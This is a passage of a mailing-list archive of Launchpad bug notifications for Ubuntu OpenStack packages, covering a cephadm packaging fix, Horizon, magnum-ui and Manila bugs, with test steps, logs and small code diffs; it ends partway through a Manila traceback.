https://bugs.launchpad.net/ubuntu/+source/ceph/+bug/2063456/+subscriptions From 2063456 at bugs.launchpad.net Thu Aug 1 14:06:47 2024 From: 2063456 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 14:06:47 -0000 Subject: [Bug 2063456] Update Released References: <171405346965.2999622.7629650603626855594.malonedeb@juju-98d295-prod-launchpad-4> Message-ID: <172252120800.774372.4314959163752344501.malone@juju-98d295-prod-launchpad-7> The verification of the Stable Release Update for ceph has completed successfully and the package is now being released to -updates. 
Subsequently, the Ubuntu Stable Release Updates Team is being unsubscribed and will not receive messages about this bug report. In the event that you encounter a regression using the package from -updates please report a new bug using ubuntu-bug and tag the bug report regression-update so we can easily find any regressions. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to ceph in Ubuntu. https://bugs.launchpad.net/bugs/2063456 Title: package cephadm: dependency "cephadmlib" missing Status in ceph package in Ubuntu: Fix Released Status in ceph source package in Noble: Fix Released Status in ceph source package in Oracular: Fix Released Bug description: [ Impact ] cephadm tool is not usable due to files missing from the package. [ Test Plan ] sudo apt install cephadm cephadm bootstrap --mon-ip 10.23.127.2 [ Where problems could occur ] While fixing the minor packaging issue that causes this problem it was also noticed that the package is architecture any rather than all (and its pure python) so the packaging update includes this as well. [ Original Bug Report ] After installing cephadm at least on arm64 cephadmlib is missing. Traceback (most recent call last):   File "/usr/sbin/cephadm", line 33, in     from cephadmlib.constants import ( ModuleNotFoundError: No module named 'cephadmlib' Steps to reproduce (on ARM64) root at ceph-node1:~# apt install -y cephadm Reading package lists... Done Building dependency tree... Done Reading state information... 
Done The following additional packages will be installed:   bridge-utils containerd dns-root-data dnsmasq-base docker.io pigz runc ubuntu-fan Suggested packages:   ifupdown aufs-tools cgroupfs-mount | cgroup-lite debootstrap docker-buildx docker-compose-v2   docker-doc rinse zfs-fuse | zfsutils The following NEW packages will be installed:   bridge-utils cephadm containerd dns-root-data dnsmasq-base docker.io pigz runc ubuntu-fan 0 upgraded, 9 newly installed, 0 to remove and 0 not upgraded. root at ceph-node1:~# cephadm bootstrap --mon-ip 10.23.127.2 Traceback (most recent call last):   File "/usr/sbin/cephadm", line 33, in     from cephadmlib.constants import ( ModuleNotFoundError: No module named 'cephadmlib' ProblemType: Bug DistroRelease: Ubuntu 24.04 Package: cephadm 19.2.0~git20240301.4c76c50-0ubuntu6 ProcVersionSignature: Ubuntu 6.8.0-31.31-generic 6.8.1 Uname: Linux 6.8.0-31-generic aarch64 ApportVersion: 2.28.1-0ubuntu2 Architecture: arm64 CasperMD5CheckResult: pass Date: Thu Apr 25 13:49:50 2024 InstallationDate: Installed on 2024-04-25 (0 days ago) InstallationMedia: Ubuntu-Server 24.04 LTS "Noble Numbat" - Release arm64 (20240423) ProcEnviron:  LANG=en_US.UTF-8  LC_CTYPE=C.UTF-8  PATH=(custom, no user)  SHELL=/bin/bash  TERM=xterm-256color SourcePackage: ceph UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ceph/+bug/2063456/+subscriptions From 2054799 at bugs.launchpad.net Thu Aug 1 14:56:31 2024 From: 2054799 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 01 Aug 2024 14:56:31 -0000 Subject: [Bug 2054799] Fix included in openstack/horizon 23.1.1 References: <170868334749.696109.18152739056199258442.malonedeb@juju-98d295-prod-launchpad-7> Message-ID: <172252419122.402566.3900115495324588818.malone@juju-98d295-prod-launchpad-2> This issue was fixed in the openstack/horizon 23.1.1 release. 
-- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to horizon in Ubuntu. https://bugs.launchpad.net/bugs/2054799 Title: [SRU] Issue with Project administration at Cloud Admin level Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Dashboard (Horizon): Fix Released Status in horizon package in Ubuntu: Fix Released Status in horizon source package in Jammy: Fix Released Status in horizon source package in Mantic: Fix Released Status in horizon source package in Noble: Fix Released Status in horizon source package in Oracular: Fix Released Bug description: [Impact] We are not able to see the list of users and groups assigned to a project in Horizon. [Test Case] Please refer to [Test steps] section below. [Regression Potential] The fix ed768ab is already in the upstream main, stable/2024.1, stable/2023.2 branches, so it is a clean backport and might be helpful for deployments using dashboard. Regressions would likely manifest in the users/groups tabs when listing users. [Others] Original Bug Description Below =========== We are not able to see the list of users assigned to a project in Horizon. Scenario: - Log in as Cloud Admin - Set Domain Context (k8s) - Go to projects section - Click on project Permissions_Roles_Test - Go to Users Expectation: Get a table with the users assigned to this project. Result: Get an error - https://i.imgur.com/TminwUy.png [attached] [Test steps] 1, Create an ordinary openstack test env with horizon. 
2, Prepare some test data (eg: one domain k8s, one project k8s, and one user k8s-admin with the role k8s-admin-role)

openstack domain create k8s
openstack role create k8s-admin-role
openstack project create --domain k8s k8s
openstack user create --project-domain k8s --project k8s --domain k8s --password password k8s-admin
openstack role add --user k8s-admin --user-domain k8s --project k8s --project-domain k8s k8s-admin-role

$ openstack role assignment list --project k8s --names
+----------------+------------------+-------+------------+--------+--------+-----------+
| Role           | User             | Group | Project    | Domain | System | Inherited |
+----------------+------------------+-------+------------+--------+--------+-----------+
| k8s-admin-role | k8s-admin at k8s |       | k8s at k8s |        |        | False     |
+----------------+------------------+-------+------------+--------+--------+-----------+

3, Log in to the horizon dashboard with the admin user (eg: admin/openstack/admin_domain).
4, Click 'Identity -> Domains' to set domain context to the domain 'k8s'.
5, Click 'Identity -> Project -> k8s project -> Users'.
6, This is the result; it says 'Unable to display the users of this project' - https://i.imgur.com/TminwUy.png
7, These are some logs:

==> /var/log/apache2/error.log <==
[Fri Feb 23 10:03:12.201024 2024] [wsgi:error] [pid 47342:tid 140254008985152] [remote 10.5.3.120:58978] Recoverable error: 'e900b8934d11458b8eb9db21671c1b11'

==> /var/log/apache2/ssl_access.log <==
10.5.3.120 - - [23/Feb/2024:10:03:11 +0000] "GET /identity/07123041ee0544e0ab32e50dde780afd/detail/?tab=project_details__users HTTP/1.1" 200 1125 "https://10.5.3.120/identity/07123041ee0544e0ab32e50dde780afd/detail/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"

[Some Analyses]
This action will call this function in horizon [1]. This function first gets a list of users (api.keystone.user_list) [2], then the role assignment list (api.keystone.get_project_users_roles) [3].
Without setting domain context, this works fine. However, if setting domain context, the project displayed is in a different domain. The user list from [2] only contains users of the user's own domain, while the role assignment list [3] includes users in another domain since the project is in another domain. From horizon's debug log, here is an example of user list: {"users": [{"email": "juju at localhost", "id": "8cd8f92ac2f94149a91488ad66f02382", "name": "admin", "domain_id": "103a4eb1712f4eb9873240d5a7f66599", "enabled": true, "password_expires_at": null, "options": {}, "links": {"self": "https://192.168.1.59:5000/v3/users/8cd8f92ac2f94149a91488ad66f02382"}}], "links": {"next": null, "self": "https://192.168.1.59:5000/v3/users", "previous": null}} Here is an example of role assignment list: {"role_assignments": [{"links": {"assignment": "https://192.168.1.59:5000/v3/projects/82e250e8492b49a1a05467994d33ea1b/users/a70745ed9ac047ad88b917f24df3c873/roles/f606fafcb4fd47018aeffec2b07b7e84"}, "scope": {"project": {"id": "82e250e8492b49a1a05467994d33ea1b"}}, "user": {"id": "a70745ed9ac047ad88b917f24df3c873"}, "role": {"id": "f606fafcb4fd47018aeffec2b07b7e84"}}, {"links": {"assignment": "https://192.168.1.59:5000/v3/projects/82e250e8492b49a1a05467994d33ea1b/users/fd7a79e2a4044c17873c08daa9ed37a1/roles/b936a9d998be4500900a5a9174b16b42"}, "scope": {"project": {"id": "82e250e8492b49a1a05467994d33ea1b"}}, "user": {"id": "fd7a79e2a4044c17873c08daa9ed37a1"}, "role": {"id": "b936a9d998be4500900a5a9174b16b42"}}], "links": {"next": null, "self": "https://192.168.1.59:5000/v3/role_assignments?scope.project.id=82e250e8492b49a1a05467994d33ea1b&include_subtree=True", "previous": null}} Then later in the horizon function, it tries to get user details from user list for users in role assignment list [4], and fails, because users in role assignment list don't exist in user list. 
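The failing step boils down to indexing the domain-scoped user list by the user ids coming from the cross-domain role assignment list. A minimal Python sketch of that lookup (hypothetical data and function names, not the actual horizon implementation):

```python
# user_list mimics api.keystone.user_list: scoped to the admin's own domain.
# assignments mimics the role assignment list: scoped to the project's domain,
# so it can reference users that are absent from user_list.
user_list = [{"id": "8cd8f92ac2f94149a91488ad66f02382", "name": "admin"}]
assignments = [{"user_id": "e900b8934d11458b8eb9db21671c1b11", "role": "k8s-admin-role"}]

users_by_id = {u["id"]: u for u in user_list}

def project_user_rows(users_by_id, assignments):
    # Indexing by an id that only exists in the assignment list raises the
    # KeyError that horizon logs as "Recoverable error: '<user id>'".
    return [(users_by_id[a["user_id"]], a["role"]) for a in assignments]

try:
    project_user_rows(users_by_id, assignments)
except KeyError as exc:
    print(f"Recoverable error: {exc}")  # prints the missing user id in quotes
```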
Horizon throws an error like: [Fri Feb 23 10:03:12.201024 2024] [wsgi:error] [pid 47342:tid 140254008985152] [remote 10.5.3.120:58978] Recoverable error: 'e900b8934d11458b8eb9db21671c1b11' This id is the id of a user, which is used as a key to find a user in the user list. But user list doesn't have this id, so it fails. [1] https://github.com/openstack/horizon/blob/master/openstack_dashboard/dashboards/identity/projects/tabs.py#L85 [2] https://github.com/openstack/horizon/blob/master/openstack_dashboard/dashboards/identity/projects/tabs.py#L96 [3] https://github.com/openstack/horizon/blob/master/openstack_dashboard/dashboards/identity/projects/tabs.py#L100 [4] https://github.com/openstack/horizon/blob/master/openstack_dashboard/dashboards/identity/projects/tabs.py#L108 To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2054799/+subscriptions From 1993005 at bugs.launchpad.net Thu Aug 1 14:57:17 2024 From: 1993005 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 01 Aug 2024 14:57:17 -0000 Subject: [Bug 1993005] Fix included in openstack/horizon 23.1.1 References: <166577916945.35938.15912952479644408967.malonedeb@daniels.canonical.com> Message-ID: <172252423738.1691982.17632401013503698677.malone@juju-98d295-prod-launchpad-4> This issue was fixed in the openstack/horizon 23.1.1 release. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to horizon in Ubuntu. https://bugs.launchpad.net/bugs/1993005 Title: Swift file upload fails on zed with "This name already exists." for non-existing files Status in OpenStack Dashboard (Horizon): Fix Released Status in horizon package in Ubuntu: Fix Released Bug description: Swift file upload fails on zed with "This name already exists." for non-existing files. Please see attached screenshot for the behavior. I've narrowed this down to a change in 'function getObjectDetails' in swift.service.js. 
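The behavioral difference between returning the original rejected promise and returning promise.catch(angular.noop) can be mimicked in Python (a hypothetical analogue, not horizon code): once the "not found" error is swallowed, the existence probe looks successful, so the upload pre-check concludes the name is already taken:

```python
def probe(store, name, swallow):
    # Stand-in for getObjectDetails: with swallow=True the "not found" error is
    # absorbed, like promise.catch(angular.noop) -- the caller can no longer
    # tell "object absent" from "object found".
    try:
        return store[name]
    except KeyError:
        if swallow:
            return None  # error swallowed: indistinguishable from success
        raise

def upload_allowed(store, name, swallow):
    # The pre-upload existence check: uploading is allowed only when the
    # probe fails, i.e. no object with that name exists yet.
    try:
        probe(store, name, swallow)
    except KeyError:
        return True
    return False

print(upload_allowed({}, "new.txt", swallow=False))  # True: upload proceeds
print(upload_allowed({}, "new.txt", swallow=True))   # False: "This name already exists."
```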
The 'Migrate to AngularJS v1.8.2' change in commit f044c4b0a3 updated the file with:

@@ -297,9 +297,9 @@
       );
       if (ignoreError) {
         // provide a noop error handler so the error is ignored
-        return promise.error(angular.noop);
+        return promise.catch(angular.noop);
       }
-      return promise.error(function () {
+      return promise.catch(function onError() {
         toastService.add('error', gettext('Unable to get details of the object.'));
       });
     }

If I revert these 2 lines of code, I'm able to upload a file again without the error; however, I'm also able to upload it twice and overwrite the existing file the 2nd time.

Update: Specifically reverting the first LOC to the following seems to fix this:

return promise.error(angular.noop);

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1993005/+subscriptions

From 1728031 at bugs.launchpad.net Thu Aug 1 14:56:39 2024
From: 1728031 at bugs.launchpad.net (OpenStack Infra)
Date: Thu, 01 Aug 2024 14:56:39 -0000
Subject: [Bug 1728031] Fix included in openstack/horizon 23.1.1
References: <150910584425.20448.7125062752134236004.malonedeb@soybean.canonical.com>
Message-ID: <172252419955.988949.350944872804466661.malone@juju-98d295-prod-launchpad-3>

This issue was fixed in the openstack/horizon 23.1.1 release.

-- 
You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to horizon in Ubuntu.
https://bugs.launchpad.net/bugs/1728031 Title: [SRU] Unable to change user password when ENFORCE_PASSWORD_CHECK is True Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Won't Fix Status in OpenStack Dashboard (Horizon): Fix Released Status in horizon package in Ubuntu: Fix Released Status in horizon source package in Jammy: Fix Released Status in horizon source package in Mantic: Fix Released Status in horizon source package in Noble: Fix Released Status in horizon source package in Oracular: Fix Released Bug description: After following the security hardening guidelines: https://docs.openstack.org/security-guide/dashboard/checklist.html#check-dashboard-09-is-enforce-password-check-set-to-true After this check is enabled Check-Dashboard-09: Is ENFORCE_PASSWORD_CHECK set to True The user password cannot be changed. The form submission fails by displaying that admin password is incorrect. The reason for this is in keystone.py in openstack_dashboard/api/keystone.py user_verify_admin_password method uses internal url to communicate with the keystone. line 500: endpoint = _get_endpoint_url(request, 'internalURL') This should be changed to adminURL =============== SRU Description =============== [Impact] Admins cannot change user's password as it gives an error saying that the admin's password is incorrect, despite being correct. There are 2 causes: 1) due to the lack of user_domain being specified when validating the admin's password, it will always fail if the admin is not registered in the "default" domain, because the user_domain defaults to "default" when not specified. 2) even if the admin user is registered in the "default" domain, it may fail due to the wrong endpoint being used in the request to validate the admin's password. 
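Cause 1 can be sketched in a few lines of Python (hypothetical names, not the actual horizon/keystone code): when no user_domain is passed along, the validation silently authenticates against the "default" domain, so a correct admin password is still rejected for admins registered elsewhere:

```python
# Hypothetical credential store: the admin lives in "admin_domain", not "default".
CREDENTIALS = {("admin", "admin_domain"): "s3cret"}

def verify_admin_password(name, password, user_domain=None):
    # The problematic fallback: an omitted domain becomes "default".
    domain = user_domain or "default"
    return CREDENTIALS.get((name, domain)) == password

print(verify_admin_password("admin", "s3cret"))                               # False: wrongly rejected
print(verify_admin_password("admin", "s3cret", user_domain="admin_domain"))   # True: domain passed along
```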
The issues are fixed in 2 separate patches [1] and [2]. However, [2] is introducing a new config option, while [1] alone is also enough to fix the occurrence on some deployments. We are including only [1] in the SRU. [Test Plan] Part 1/2) Test case 1. Setting up the env, ensure ENFORCE_PASSWORD_CHECK is set to True 1a. Deploy openstack env with horizon/openstack-dashboard 1b. Set up admin user in a domain not named "default", such as "admin_domain". 1c. Set up any other user, such as demo. Preferably in the admin_domain as well for convenience. 2. Reproduce the bug 2a. Login as admin and navigate to Identity > Users 2b. On the far right-hand side of the demo user row, click the options button and select Change Password 2c. Type in any new password, repeat it below, and type in the admin password. Click Save and you should see a message "The admin password is incorrect" 3. Install package that contains the fixed code 4. Confirm fix 5a. Repeat steps 2a-2c 5b. The password should now be saved successfully Part 2/2) Expected failures Check that password changes will continue to fail in scenarios where it is expected to fail, such as: - admin password incorrect - user not authorized cases (comment #35) [Where problems could occur] The code is a 1-line change that was tested in upstream CI (without the addition of bug-specific functional tests) from master(Caracal) to stable/zed without any issue captured. No side effects or risks are foreseen. Usage of fix [1] has also been tested manually without fix [2] and still worked. Worst case scenario, the ability to change password that currently does not work will still not work, because the code change is isolated to the specific function that validates the authenticity of the password used. Regressions would likely manifest when trying to change user passwords. [Other Info] None. 
[1] https://review.opendev.org/c/openstack/horizon/+/913250
[2] https://review.opendev.org/c/openstack/horizon/+/844574

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-archive/+bug/1728031/+subscriptions

From 2038663 at bugs.launchpad.net Thu Aug 1 15:33:51 2024
From: 2038663 at bugs.launchpad.net (Felipe Reyes)
Date: Thu, 01 Aug 2024 15:33:51 -0000
Subject: [Bug 2038663] Re: no option to override the fixed_subnet when creating a new cluster
References: <169659880082.470726.6502280352779991684.malonedeb@juju-98d295-prod-launchpad-3>
Message-ID: <172252643127.910691.18422035581027542947.malone@juju-98d295-prod-launchpad-7>

** Patch added: "lp2038663_antelope.debdiff"
   https://bugs.launchpad.net/ubuntu/+source/magnum-ui/+bug/2038663/+attachment/5801997/+files/lp2038663_antelope.debdiff

-- 
You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive.
https://bugs.launchpad.net/bugs/2038663

Title: [SRU] no option to override the fixed_subnet when creating a new cluster

Status in Ubuntu Cloud Archive: Invalid
Status in Ubuntu Cloud Archive antelope series: New
Status in Ubuntu Cloud Archive bobcat series: Won't Fix
Status in Ubuntu Cloud Archive ussuri series: New
Status in Ubuntu Cloud Archive yoga series: New
Status in Ubuntu Cloud Archive zed series: Won't Fix
Status in Magnum UI: Fix Released
Status in magnum-ui package in Ubuntu: Invalid
Status in magnum-ui source package in Focal: New
Status in magnum-ui source package in Jammy: New

Bug description:
[Impact]
When a cluster template sets fixed_network and fixed_subnet and the user tries to create a new cluster using that template and decides to override the network, the fixed_subnet will be inherited from the template, leaving an invalid configuration; Neutron will later refuse to allocate a port (since the subnet doesn't belong to the network).
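A minimal sketch of the intended template/override merge (a hypothetical function, not the actual magnum-ui code): when the network is overridden, the template's subnet must not survive the merge, since it belongs to the old network:

```python
# Hypothetical merge of a cluster template with user overrides.
def build_cluster_spec(template, overrides):
    spec = {**template, **overrides}
    # Without this guard the template's fixed_subnet survives a network
    # override, yielding a subnet that belongs to a different network.
    if "fixed_network" in overrides and "fixed_subnet" not in overrides:
        spec["fixed_subnet"] = None  # let the user (or Neutron) pick one instead
    return spec

template = {"fixed_network": "test-net", "fixed_subnet": "test-subnet"}
spec = build_cluster_spec(template, {"fixed_network": "other-net"})
print(spec["fixed_subnet"])  # None: the stale subnet is no longer inherited
```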
For more details see https://bugs.launchpad.net/ubuntu/+source/magnum/+bug/2038109 [Test Case] 1. Create a new cluster template with a fixed_network test-net and fixed_subnet test-subnet 2. Create a new cluster, uncheck the option "Create new network" and pick a network different from test-net in the dropdown list. Expected result: The cluster gets created Actual result: The cluster creation fails, because the network configuration is invalid. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2038663/+subscriptions From 2038663 at bugs.launchpad.net Thu Aug 1 15:34:20 2024 From: 2038663 at bugs.launchpad.net (Felipe Reyes) Date: Thu, 01 Aug 2024 15:34:20 -0000 Subject: [Bug 2038663] Re: no option to override the fixed_subnet when creating a new cluster References: <169659880082.470726.6502280352779991684.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252646026.1042323.315991034390987820.malone@juju-98d295-prod-launchpad-3> ** Patch added: "lp2038663_jammy.debdiff" https://bugs.launchpad.net/ubuntu/+source/magnum-ui/+bug/2038663/+attachment/5801998/+files/lp2038663_jammy.debdiff -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. 
https://bugs.launchpad.net/bugs/2038663 Title: [SRU] no option to override the fixed_subnet when creating a new cluster Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive antelope series: New Status in Ubuntu Cloud Archive bobcat series: Won't Fix Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: Won't Fix Status in Magnum UI: Fix Released Status in magnum-ui package in Ubuntu: Invalid Status in magnum-ui source package in Focal: New Status in magnum-ui source package in Jammy: New Bug description: [Impact] When a cluster template sets fixed_network and fixed_subnet and the user tries to create a new cluster using that template and decides to override the network, the fixed_subnet will inherited from the template, leaving an invalid configuration and later Neutron will refuse to allocate a port (since the subnet doesn't belong to the network). For more details see https://bugs.launchpad.net/ubuntu/+source/magnum/+bug/2038109 [Test Case] 1. Create a new cluster template with a fixed_network test-net and fixed_subnet test-subnet 2. Create a new cluster, uncheck the option "Create new network" and pick a network different from test-net in the dropdown list. Expected result: The cluster gets created Actual result: The cluster creation fails, because the network configuration is invalid. 
To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2038663/+subscriptions From 2038663 at bugs.launchpad.net Thu Aug 1 15:34:50 2024 From: 2038663 at bugs.launchpad.net (Felipe Reyes) Date: Thu, 01 Aug 2024 15:34:50 -0000 Subject: [Bug 2038663] Re: no option to override the fixed_subnet when creating a new cluster References: <169659880082.470726.6502280352779991684.malonedeb@juju-98d295-prod-launchpad-3> Message-ID: <172252649012.911541.631450373276875464.malone@juju-98d295-prod-launchpad-7> ** Patch added: "lp2038663_focal.debdiff" https://bugs.launchpad.net/ubuntu/+source/magnum-ui/+bug/2038663/+attachment/5801999/+files/lp2038663_focal.debdiff ** Summary changed: - no option to override the fixed_subnet when creating a new cluster + [SRU] no option to override the fixed_subnet when creating a new cluster -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/2038663 Title: [SRU] no option to override the fixed_subnet when creating a new cluster Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive antelope series: New Status in Ubuntu Cloud Archive bobcat series: Won't Fix Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive yoga series: New Status in Ubuntu Cloud Archive zed series: Won't Fix Status in Magnum UI: Fix Released Status in magnum-ui package in Ubuntu: Invalid Status in magnum-ui source package in Focal: New Status in magnum-ui source package in Jammy: New Bug description: [Impact] When a cluster template sets fixed_network and fixed_subnet and the user tries to create a new cluster using that template and decides to override the network, the fixed_subnet will inherited from the template, leaving an invalid configuration and later Neutron will refuse to allocate a port (since the subnet doesn't belong to the network). 
For more details see https://bugs.launchpad.net/ubuntu/+source/magnum/+bug/2038109 [Test Case] 1. Create a new cluster template with a fixed_network test-net and fixed_subnet test-subnet 2. Create a new cluster, uncheck the option "Create new network" and pick a network different from test-net in the dropdown list. Expected result: The cluster gets created Actual result: The cluster creation fails, because the network configuration is invalid. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2038663/+subscriptions From 2069125 at bugs.launchpad.net Thu Aug 1 15:41:00 2024 From: 2069125 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 01 Aug 2024 15:41:00 -0000 Subject: [Bug 2069125] Fix included in openstack/manila 16.2.1 References: <171818195903.325609.11857475105697361395.malonedeb@juju-98d295-prod-launchpad-2> Message-ID: <172252686058.1752322.7399405978639685359.malone@juju-98d295-prod-launchpad-4> This issue was fixed in the openstack/manila 16.2.1 release. ** Changed in: cloud-archive/antelope Status: New => Fix Released -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. 
https://bugs.launchpad.net/bugs/2069125

Title: [SRU] Manila driver error with ONTAP SVM-scoped user

Status in Ubuntu Cloud Archive: New
Status in Ubuntu Cloud Archive antelope series: Fix Released
Status in Ubuntu Cloud Archive bobcat series: New
Status in Ubuntu Cloud Archive caracal series: New
Status in Ubuntu Cloud Archive yoga series: Fix Committed
Status in Ubuntu Cloud Archive zed series: Won't Fix
Status in OpenStack Shared File Systems Service (Manila): Fix Released
Status in manila package in Ubuntu: New
Status in manila source package in Jammy: New
Status in manila source package in Mantic: Won't Fix
Status in manila source package in Noble: New

Bug description:
************** SRU DESCRIPTION AT THE BOTTOM *************

The same NetApp stanza in the manila.conf file that was used without any issue in the Zed release was used in the Bobcat release. In the Bobcat release the share creation worked normally, but adding an access rule did not work and the share could not be deleted. Below is the error log that occurs when adding a rule. I set all the roles indicated in NetApp's OpenStack operation guide on the storage side (https://netapp-openstack-dev.github.io/openstack-docs/bobcat/manila/configuration/ontap_configuration/section_ontap-config.html#ontap-prerequisites).
########### manila-share.log ############ 2024-05-27 15:43:14.708 19 INFO oslo.messaging.notification.share.create.end [None req-4b46bc06-9332-40f3-9ef0-57895519228c c2e47ee4c8295d950db5757f73dfe9b5149947ccf5dc4e4ba3370c210217bcc4 76a637a88d624e3ea80b261a4c66dc2a - - - -] {"message_id": "d9fcc12a-5449-437c-85a0-eb5bdddab553", "publisher_id": "share.dc1-infra-rnd-stack-ctrl-01 at c400", "event_type": "share.create.end", "priority": "INFO", "payload": {"share_id": "68e79de3-5e22-472b-a895-c79e0b677b01", "user_id": "c2e47ee4c8295d950db5757f73dfe9b5149947ccf5dc4e4ba3370c210217bcc4", "project_id": "76a637a88d624e3ea80b261a4c66dc2a", "snapshot_id": null, "share_group_id": null, "size": 20, "name": "asdasd", "description": null, "proto": "NFS", "is_public": true, "availability_zone": null, "host": "dc1-infra-rnd-stack-ctrl-01 at c400#N1_Data", "status": "creating", "share_type_id": "40cdd81c-1fa8-4fc6-8f5e-288d0b9f5430", "share_type": "NFS_VOLUME"}, "timestamp": "2024-05-27 06:43:14.708153"} 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server [None req-be5d1bf0-c013-47ac-94bc-2de599a3862f c2e47ee4c8295d950db5757f73dfe9b5149947ccf5dc4e4ba3370c210217bcc4 76a637a88d624e3ea80b261a4c66dc2a - - - -] Exception during message handling: manila.share.drivers.netapp.dataontap.client.api.NaApiError: NetApp API failed. 
Reason - 15661:entry doesn't exist 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server Traceback (most recent call last): 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/oslo_messaging/rpc/server.py", line 165, in _process_incoming 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server res = self.dispatcher.dispatch(message) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/oslo_messaging/rpc/dispatcher.py", line 309, in dispatch 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return self._do_dispatch(endpoint, method, ctxt, args) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/oslo_messaging/rpc/dispatcher.py", line 229, in _do_dispatch 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server result = func(ctxt, **new_args) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/manager.py", line 236, in wrapped 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return f(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/utils.py", line 481, in wrapper 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server return func(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/manager.py", line 4177, in update_access 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server self.update_access_for_instances(context, [share_instance_id], 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/manager.py", line 4191, in update_access_for_instances 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server 
self.access_helper.update_access_rules( 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/access.py", line 299, in update_access_rules 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server self._update_access_rules(context, share_instance_id, 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/access.py", line 336, in _update_access_rules 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server driver_rule_updates = self._update_rules_through_share_driver( 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/access.py", line 401, in _update_rules_through_share_driver 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server driver_rule_updates = self.driver.update_access( 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/cluster_mode/drv_single_svm.py", line 103, in update_access 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server self.library.update_access(context, share, access_rules, add_rules, 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/utils.py", line 115, in trace_wrapper 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server result = f(self, *args, **kwargs) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File "/var/lib/kolla/venv/lib64/python3.9/site-packages/manila/share/drivers/netapp/dataontap/cluster_mode/lib_base.py", line 2355, in update_access 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server helper.update_access(share, share_name, access_rules) 2024-05-27 15:43:57.077 19 ERROR oslo_messaging.rpc.server File 
